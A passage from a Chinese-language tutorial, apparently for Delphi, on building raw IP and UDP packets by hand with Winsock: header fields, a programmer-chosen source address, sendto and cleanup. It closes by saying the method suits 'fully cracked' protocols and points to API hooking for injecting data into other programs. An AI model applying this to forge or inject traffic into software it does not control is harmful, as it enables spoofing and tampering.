PChar);2、定义包的总大小、IP的版本信息为IP结构：总包大小=IP头的大小+UDP头的大小+UDP消息的大小，IP的版本，在此程序里定义为4，3、填写IP包头的结构：ip.ipverlen := IP的版本 shl 4; ip.iptos := 0; // IP服务类型ip.iptotallength := ; // 总包大小 ip.ipid := 0; // 唯一标识，一般设置为0ip.ipoffset := 0; // 偏移字段 ip.ipttl := 128; // 超时时间ip.ipprotocol := $11; // 定义协议 ip.ipchecksum := 0 ; // 检验总数ip.ipsrcaddr := ; // 源地址ip.ipdestaddr := ; // 目标地址4、填写UDP包头的结构：udp.srcportno := ; //源端口号udp.dstportno := ; //目标端口号udp.udplength := ; //UDP包的大小udp.udpchecksum := ; //检验总数5、把IP包头，UDP包头及消息，放入缓存。6、定义远程信息：remote.family := 2; remote.port :=; //远程端口remote.addr.addr :=; //远程地址5）我们用SendTo发送封包，用法如下： INTEGER sendto(s: Integer,var Buf: Integer,var len: Integer,var flags: Integer, var addrto: TSock_Addr; tolen: Integer); 在S处传入的是Socket句柄,Buf是刚刚建好的封包，len传入封包的总长度刚刚计算过了，flag是传入标记在这里我们设为0，addto发送到的目标地址，在这里我们就传入remote就可以了，tolen写入的是remote的大小。6）到了最后别忘记了用CloseSocket(sh)关了socket和用WSACleanup关了winsock。最后要说的是这种发送方式，只能发送完全被破解的网络协议，如果要在别人的程序中间发送数据就只有用APIHOOK或在winsock2做中间层了。